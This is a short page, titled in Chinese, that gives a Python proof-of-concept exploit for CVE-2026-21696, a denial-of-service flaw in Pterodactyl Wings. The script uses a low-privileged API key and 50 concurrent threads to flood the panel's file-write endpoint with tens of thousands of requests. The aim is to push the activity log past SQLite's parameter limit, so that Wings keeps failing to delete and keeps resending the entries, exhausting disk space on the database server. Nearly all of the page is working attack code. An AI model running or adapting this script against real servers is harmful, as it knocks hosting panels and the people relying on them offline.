CVE-2026-21696 Pterodactyl Wings SQLite参数限制DoS漏洞

# CVE-2026-21696 PoC - Generate excessive activity logs to trigger SQLite parameter limit # This PoC demonstrates how an attacker can trigger the vulnerability by generating # more than 32766 activity log entries that will cause Wings to fail deleting them import requests import time import concurrent.futures # Target configuration TARGET_PANEL = "https://pterodactyl-panel.local" API_KEY = "your_low_privileged_api_key" SERVER_ID = "your_server_id" def generate_sftp_activity(session, server_id): """Generate SFTP activity to create log entries""" headers = { "Authorization": f"Bearer {API_KEY}", "Content-Type": "application/json" } # Create multiple file operations via SFTP to generate activity logs for i in range(1000): try: # Simulate file upload/download operations response = session.post( f"{TARGET_PANEL}/api/client/servers/{server_id}/files/write", headers=headers, json={"path": f"/tmp/test_{i}.txt", "content": "x" * 1000} ) except Exception as e: print(f"Activity {i} triggered") def trigger_vulnerability(): """Trigger CVE-2026-21696 by generating excessive activity logs""" session = requests.Session() print("Starting activity log generation...") print("Goal: Generate > 32766 log entries to trigger SQLite parameter limit") # Use concurrent requests to generate logs faster with concurrent.futures.ThreadPoolExecutor(max_workers=50) as executor: futures = [executor.submit(generate_sftp_activity, session, SERVER_ID) for _ in range(35)] concurrent.futures.wait(futures) print("Activity logs generated. Wait for Wings cron job to process...") print("The cron job will fail to delete entries and repeatedly resend them.") print("Monitor disk space on panel database server.") if __name__ == "__main__": trigger_vulnerability()